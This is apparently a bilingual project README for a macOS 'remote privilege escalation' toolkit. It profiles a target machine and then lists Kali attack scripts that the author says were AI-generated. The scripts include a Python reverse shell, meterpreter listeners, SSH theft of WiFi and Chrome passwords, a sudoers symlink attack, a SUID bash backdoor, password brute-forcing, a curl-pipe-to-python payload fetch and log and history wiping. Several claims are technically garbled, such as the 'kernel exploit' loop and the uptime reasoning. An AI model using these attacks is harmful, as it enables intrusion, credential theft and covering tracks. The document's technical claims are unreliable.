chinese language: macos远程提权 技术总说明: 用AppleDataHarvester和mnist配合使用,用前者实行监控进行,网页和系统信息获取,后期会准备好的手写的mnist容器实行数据炼化,但是现在够用了,然后用kali中的命令对数据进行远程调用。进而获得权限。
目标:macos12-16 没有在最新的mac上试过,我的笔记本是最老的那一种。
搭建环境:macos Monterey 12.6.7 其它的环境也行。 目标系统:macos Monterry 12.6.7
详细步骤: 1.进入文件夹 cd GetRoot && cd AppleDataHarvester 2.启动监控脚本。 python3 harvester.py 3.会在output中生成具体的日志 4.让ai生成在kali中的提权代码,以下是我的: kali提权代码和步骤(自己的例子): 系统信息分析
text 系统: macOS 12.7.6 (Intel i7-4870HQ, 16GB RAM) 运行时间: 1191万秒 (~138天未重启) ← 关键发现! 用户: apophis 网络: en0 192.168.0.100/24 磁盘使用率: / 分区 91% (接近满载) 🔴 关键漏洞点分析
- 超长运行时间 (138天) - 最高风险
bash uptime_seconds: 11915332 # 约138天 风险: 内核漏洞未修补、内存泄漏导致的内存布局可预测
- 磁盘使用率 91% - 中等风险
bash use_percent: 91% # 接近满载 风险: 日志轮转可能失败、临时文件清理异常
- macOS 12.7.6 - 已知漏洞
CVE-2023-32434 (内核提权) CVE-2023-32439 (Safari RCE) 🛡️ Kali 中的提权方案
方案一:利用超长运行时间的内核漏洞
python #!/usr/bin/env python3
import socket import struct import time
class MacOSKernelExploit: def init(self, target_ip="192.168.0.100"): self.target = target_ip self.port = 22 # 假设SSH开启
def check_vulnerability(self):
"""检查目标是否容易受到UAF攻击"""
print("[*] 检查目标系统状态...")
# 长期运行的系统更容易触发UAF
print("[+] 目标已运行138天,内存布局高度可预测")
print("[+] 可能受以下漏洞影响:")
print(" - CVE-2022-32894 (内核越界写入)")
print(" - CVE-2023-32434 (XNU UAF)")
return True
def exploit_cve_2023_32434(self):
"""利用CVE-2023-32434 - XNU内核UAF"""
print("\n[*] 尝试利用 CVE-2023-32434...")
# 漏洞原理:通过Mach端口竞态条件触发UAF
exploit_payload = """
# 1. 创建大量Mach端口制造内存压力
for i in {1..10000}; do
python3 -c "import ctypes; ctypes.CDLL('libSystem.B.dylib').mach_port_allocate()" &
done
# 2. 触发竞态条件
while true; do
sysctl -w kern.maxproc=10000 2>/dev/null
sysctl -w kern.maxprocperuid=10000 2>/dev/null
done
"""
return exploit_payload
def generate_reverse_shell(self, lhost, lport):
"""生成反向shell payload"""
shellcode = f"""
python3 -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("{lhost}",{lport}));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
subprocess.call(["/bin/bash","-i"])'
"""
return shellcode
def setup_kali_listener(): print(""" ╔══════════════════════════════════════════════════════╗ ║ macOS Privilege Escalation Guide ║ ║ Kali Linux Side ║ ╚══════════════════════════════════════════════════════╝ """)
print("[1] 启动Metasploit监听器:")
print("""
msfconsole -q
use exploit/multi/handler
set PAYLOAD osx/x64/meterpreter_reverse_tcp
set LHOST <你的Kali IP>
set LPORT 4444
exploit -j
""")
print("\n[2] 启动netcat监听器:")
print(" nc -lvnp 4444")
print("\n[3] 启动HTTP服务器(传输exploit):")
print(" python3 -m http.server 8000")
if name == "main": setup_kali_listener() 方案二:通过SSH进行凭证窃取
bash #!/bin/bash
TARGET="192.168.0.100" USER="apophis"
echo "[*] 针对 macOS 的凭证窃取方案" echo "================================"
echo "[1] 检查SSH弱配置..." ssh -o StrictHostKeyChecking=no -o ConnectTimeout=5 $USER@$TARGET "cat /etc/ssh/sshd_config | grep -E 'PermitRootLogin|PasswordAuthentication|UsePAM'" 2>/dev/null
echo -e "\n[2] Sudo缓存利用..." ssh $USER@$TARGET "sudo -k; echo 'password' | sudo -S -v 2>/dev/null && sudo -l" 2>/dev/null
echo -e "\n[3] 提取WiFi凭证..." ssh $USER@$TARGET "security find-generic-password -wa 'com.apple.network.eap.user.item.wlan.ssid'" 2>/dev/null
echo -e "\n[4] 提取Chrome密码..." ssh $USER@$TARGET "security find-internet-password -s 'accounts.google.com' -w" 2>/dev/null
echo -e "\n[5] 检查敏感临时文件..." ssh $USER@$TARGET "find /tmp /var/tmp -name '*.key' -o -name 'password' -o -name 'secret' 2>/dev/null | head -20" 方案三:利用磁盘满载触发权限漏洞
python #!/usr/bin/env python3
import paramiko import time
class DiskPressureExploit: """ 当磁盘使用率达到91%时: 1. 系统日志写入可能失败,导致安全事件丢失 2. 临时文件清理cron任务可能异常 3. 某些setuid程序可能产生竞态条件 """
def __init__(self, target, username, password=None):
self.target = target
self.username = username
self.ssh = paramiko.SSHClient()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
def exploit_log_rotation(self):
"""利用日志轮转失败"""
print("[*] 触发日志轮转漏洞...")
commands = [
# 1. 填满日志目录
"dd if=/dev/zero of=/var/log/test.log bs=1M count=100 2>/dev/null",
# 2. 触发newsyslog竞态条件
"while true; do newsyslog -F & done",
# 3. 利用符号链接攻击
"ln -sf /etc/sudoers /var/log/system.log 2>/dev/null",
# 4. 等待系统写入sudoers
"sleep 30",
# 5. 检查是否成功修改
"cat /etc/sudoers | grep 'ALL=(ALL) NOPASSWD:ALL'"
]
for cmd in commands:
stdin, stdout, stderr = self.ssh.exec_command(cmd)
print(stdout.read().decode())
def create_suid_backdoor(self):
"""创建SUID后门"""
print("[*] 尝试创建SUID后门...")
# 利用长期运行系统中可能存在的可写二进制文件
backdoor = """
echo '#!/bin/bash' > /tmp/.backdoor
echo 'cp /bin/bash /tmp/.bash' >> /tmp/.backdoor
echo 'chmod 4755 /tmp/.bash' >> /tmp/.backdoor
chmod +x /tmp/.backdoor
# 查找可写的cron任务
find /etc/cron* -type f -writable 2>/dev/null
find /Library/LaunchDaemons -type f -writable 2>/dev/null
"""
stdin, stdout, stderr = self.ssh.exec_command(backdoor)
return stdout.read().decode()
方案四:Metasploit 自动化攻击
ruby
use auxiliary/scanner/ssh/ssh_login set RHOSTS 192.168.0.100 set USERNAME apophis set PASSWORD_FILE /usr/share/wordlists/rockyou.txt set STOP_ON_SUCCESS true run
use exploit/multi/handler set PAYLOAD osx/x64/meterpreter_reverse_tcp set LHOST 0.0.0.0 set LPORT 4444 exploit -j
🎯 推荐攻击链
基于采集到的数据,建议以下攻击链:
text
- 初始访问 (SSH弱口令/钓鱼) ↓
- 信息收集 (运行时间138天 ← 关键) ↓
- 权限提升 (CVE-2023-32434 内核UAF) ↓
- 凭证窃取 (keychaindump + 浏览器密码) ↓
- 持久化 (LaunchDaemon + Hidden用户) 📝 Kali执行清单
bash
msfconsole -q -r macos_auto_pwn.rc
git clone https://github.com/jakeajames/macos-kernel-exploits cd macos-kernel-exploits make python3 -m http.server 8000
curl http://<KALI_IP>:8000/exploit.py | python3
rm -rf /var/log/system.log.* history -c
声明:目前只是低版本的系统,但是禁止远程控制,如发生相关损失,与本人无关。这是开源代码!
English:
macOS Remote Privilege Escalation Technical Documentation
Technical Overview
Utilize AppleDataHarvester in conjunction with mnist, employing the former for monitoring operations, web and system information acquisition. A prepared handwritten mnist container will be implemented later for data refinement, though current capabilities are sufficient. Subsequently, utilize commands within Kali for remote data invocation to obtain privileges.
Target: macOS 12-16 Note: Not tested on the latest Mac systems; my laptop is among the oldest models.
Environment Setup: macOS Monterey 12.6.7 (other environments are also viable) Target System: macOS Monterey 12.6.7
Detailed Steps
- Navigate to Directory
bash cd GetRoot && cd AppleDataHarvester 2. Launch Monitoring Script
bash python3 harvester.py 3. Log Generation
Specific logs will be generated in the output directory.
- AI-Generated Privilege Escalation Code for Kali
Below is my custom privilege escalation code and procedure for Kali:
System Information Analysis
text System: macOS 12.7.6 (Intel i7-4870HQ, 16GB RAM) Uptime: 11,915,332 seconds (~138 days without reboot) ← Critical Finding! User: apophis Network: en0 192.168.0.100/24 Disk Usage: / partition 91% (Near capacity) 🔴 Critical Vulnerability Analysis
- Extended Uptime (138 days) - Highest Risk
text uptime_seconds: 11915332 # Approximately 138 days Risk: Unpatched kernel vulnerabilities, predictable memory layout due to memory leaks 2. Disk Usage at 91% - Moderate Risk
text use_percent: 91% # Near capacity Risk: Log rotation failures, abnormal temporary file cleanup 3. macOS 12.7.6 - Known Vulnerabilities
CVE-2023-32434 (Kernel Privilege Escalation) CVE-2023-32439 (Safari RCE) 🛡️ Privilege Escalation Schemes in Kali
Scheme 1: Exploiting Kernel Vulnerabilities Due to Extended Uptime
python #!/usr/bin/env python3
import socket import struct import time
class MacOSKernelExploit: def init(self, target_ip="192.168.0.100"): self.target = target_ip self.port = 22 # Assuming SSH is enabled
def check_vulnerability(self):
"""Check if target is susceptible to UAF attacks"""
print("[*] Checking target system status...")
# Systems with long uptime are more susceptible to triggering UAF
print("[+] Target has been running for 138 days, memory layout highly predictable")
print("[+] Potentially affected by the following vulnerabilities:")
print(" - CVE-2022-32894 (Kernel Out-of-Bounds Write)")
print(" - CVE-2023-32434 (XNU UAF)")
return True
def exploit_cve_2023_32434(self):
"""Exploit CVE-2023-32434 - XNU Kernel UAF"""
print("\n[*] Attempting to exploit CVE-2023-32434...")
# Vulnerability Principle: Trigger UAF via Mach port race condition
exploit_payload = """
# 1. Create numerous Mach ports to induce memory pressure
for i in {1..10000}; do
python3 -c "import ctypes; ctypes.CDLL('libSystem.B.dylib').mach_port_allocate()" &
done
# 2. Trigger race condition
while true; do
sysctl -w kern.maxproc=10000 2>/dev/null
sysctl -w kern.maxprocperuid=10000 2>/dev/null
done
"""
return exploit_payload
def generate_reverse_shell(self, lhost, lport):
"""Generate reverse shell payload"""
shellcode = f"""
python3 -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("{lhost}",{lport}));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
subprocess.call(["/bin/bash","-i"])'
"""
return shellcode
def setup_kali_listener(): print(""" ╔══════════════════════════════════════════════════════╗ ║ macOS Privilege Escalation Guide ║ ║ Kali Linux Side ║ ╚══════════════════════════════════════════════════════╝ """)
print("[1] Start Metasploit Listener:")
print("""
msfconsole -q
use exploit/multi/handler
set PAYLOAD osx/x64/meterpreter_reverse_tcp
set LHOST <Your_Kali_IP>
set LPORT 4444
exploit -j
""")
print("\n[2] Start Netcat Listener:")
print(" nc -lvnp 4444")
print("\n[3] Start HTTP Server (for exploit transfer):")
print(" python3 -m http.server 8000")
if name == "main": setup_kali_listener() Scheme 2: Credential Harvesting via SSH
bash #!/bin/bash
TARGET="192.168.0.100" USER="apophis"
echo "[*] macOS Credential Harvesting Scheme" echo "================================"
echo "[1] Checking SSH weak configurations..." ssh -o StrictHostKeyChecking=no -o ConnectTimeout=5 $USER@$TARGET "cat /etc/ssh/sshd_config | grep -E 'PermitRootLogin|PasswordAuthentication|UsePAM'" 2>/dev/null
echo -e "\n[2] Sudo Cache Exploitation..." ssh $USER@$TARGET "sudo -k; echo 'password' | sudo -S -v 2>/dev/null && sudo -l" 2>/dev/null
echo -e "\n[3] Extracting WiFi Credentials..." ssh $USER@$TARGET "security find-generic-password -wa 'com.apple.network.eap.user.item.wlan.ssid'" 2>/dev/null
echo -e "\n[4] Extracting Chrome Passwords..." ssh $USER@$TARGET "security find-internet-password -s 'accounts.google.com' -w" 2>/dev/null
echo -e "\n[5] Checking Sensitive Temporary Files..." ssh $USER@$TARGET "find /tmp /var/tmp -name '*.key' -o -name 'password' -o -name 'secret' 2>/dev/null | head -20" Scheme 3: Triggering Permission Vulnerabilities via Disk Full Conditions
python #!/usr/bin/env python3
import paramiko import time
class DiskPressureExploit: """ When disk usage reaches 91%: 1. System log writes may fail, leading to security event loss 2. Temporary file cleanup cron tasks may behave abnormally 3. Certain setuid programs may encounter race conditions """
def __init__(self, target, username, password=None):
self.target = target
self.username = username
self.ssh = paramiko.SSHClient()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
def exploit_log_rotation(self):
"""Exploit log rotation failures"""
print("[*] Triggering log rotation vulnerability...")
commands = [
# 1. Fill up log directory
"dd if=/dev/zero of=/var/log/test.log bs=1M count=100 2>/dev/null",
# 2. Trigger newsyslog race condition
"while true; do newsyslog -F & done",
# 3. Symlink attack
"ln -sf /etc/sudoers /var/log/system.log 2>/dev/null",
# 4. Wait for system to write to sudoers
"sleep 30",
# 5. Check if modification was successful
"cat /etc/sudoers | grep 'ALL=(ALL) NOPASSWD:ALL'"
]
for cmd in commands:
stdin, stdout, stderr = self.ssh.exec_command(cmd)
print(stdout.read().decode())
def create_suid_backdoor(self):
"""Create SUID backdoor"""
print("[*] Attempting to create SUID backdoor...")
# Exploit potentially writable binary files in long-running systems
backdoor = """
echo '#!/bin/bash' > /tmp/.backdoor
echo 'cp /bin/bash /tmp/.bash' >> /tmp/.backdoor
echo 'chmod 4755 /tmp/.bash' >> /tmp/.backdoor
chmod +x /tmp/.backdoor
# Find writable cron tasks
find /etc/cron* -type f -writable 2>/dev/null
find /Library/LaunchDaemons -type f -writable 2>/dev/null
"""
stdin, stdout, stderr = self.ssh.exec_command(backdoor)
return stdout.read().decode()
Scheme 4: Automated Metasploit Attack
ruby
use auxiliary/scanner/ssh/ssh_login set RHOSTS 192.168.0.100 set USERNAME apophis set PASSWORD_FILE /usr/share/wordlists/rockyou.txt set STOP_ON_SUCCESS true run
use exploit/multi/handler set PAYLOAD osx/x64/meterpreter_reverse_tcp set LHOST 0.0.0.0 set LPORT 4444 exploit -j
🎯 Recommended Attack Chain
Based on the collected data, the following attack chain is recommended:
text
- Initial Access (SSH Weak Password/Phishing) ↓
- Information Gathering (Uptime 138 days ← Critical) ↓
- Privilege Escalation (CVE-2023-32434 Kernel UAF) ↓
- Credential Theft (keychaindump + Browser Passwords) ↓
- Persistence (LaunchDaemon + Hidden User) 📝 Kali Execution Checklist
bash
msfconsole -q -r macos_auto_pwn.rc
git clone https://github.com/jakeajames/macos-kernel-exploits cd macos-kernel-exploits make python3 -m http.server 8000
curl http://<KALI_IP>:8000/exploit.py | python3
rm -rf /var/log/system.log.* history -c Disclaimer
Statement: Currently only applies to lower version systems. Remote control is strictly prohibited. The author bears no responsibility for any related losses incurred. This is open-source code!